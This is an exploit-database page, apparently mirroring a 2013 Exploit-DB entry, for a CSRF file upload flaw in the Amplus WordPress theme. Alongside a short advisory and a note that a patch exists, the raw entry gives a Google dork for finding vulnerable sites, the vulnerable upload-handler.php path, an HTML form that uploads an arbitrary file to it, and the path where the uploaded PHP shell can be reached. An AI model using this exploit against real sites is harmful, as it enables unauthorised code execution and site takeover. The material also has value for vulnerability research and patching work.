header-logo
Suggest Exploit
vendor:
Amplus Themes for Wordpress
by:
DevilScreaM
8,8
CVSS
HIGH
CSRF
352
CWE
Product Name: Amplus Themes for Wordpress
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mozila, Chrome, Opera -> Windows & Linux
2013

WordPress Amplus Themes CSRF File Upload Vulnerability

A Cross-Site Request Forgery (CSRF) vulnerability exists in the Amplus Themes for Wordpress. An attacker can exploit this vulnerability to upload arbitrary PHP code and execute it in the context of the web server process. The vulnerability is due to insufficient validation of the uploaded file type. An attacker can send a malicious POST request to the upload-handler.php script in the functions directory of the theme, which will allow them to upload arbitrary PHP code and execute it in the context of the web server process.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the Amplus Themes for Wordpress.
Source

Exploit-DB raw data:

#Title : Wordpress Amplus Themes CSRF File Upload Vulnerability

#Author : DevilScreaM

#Date : 11/17/2013 - 17 November 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://themeforest.net

#Download : http://themeforest.net/item/amplus-responsive-multilingual-wordpress-theme/

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
     Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

#Dork : 

inurl:wp-content/themes/amplus


CSRF File Upload Vulnerability

Exploit & POC : 

http://site-target/wp-content/themes/amplus/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post"> 
Your File: <input name="uploadfile" type="file" /><br /> 
<input type="submit" value="upload" /> 
</form> 


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

Navigation

Suggest Exploit

Services By CQR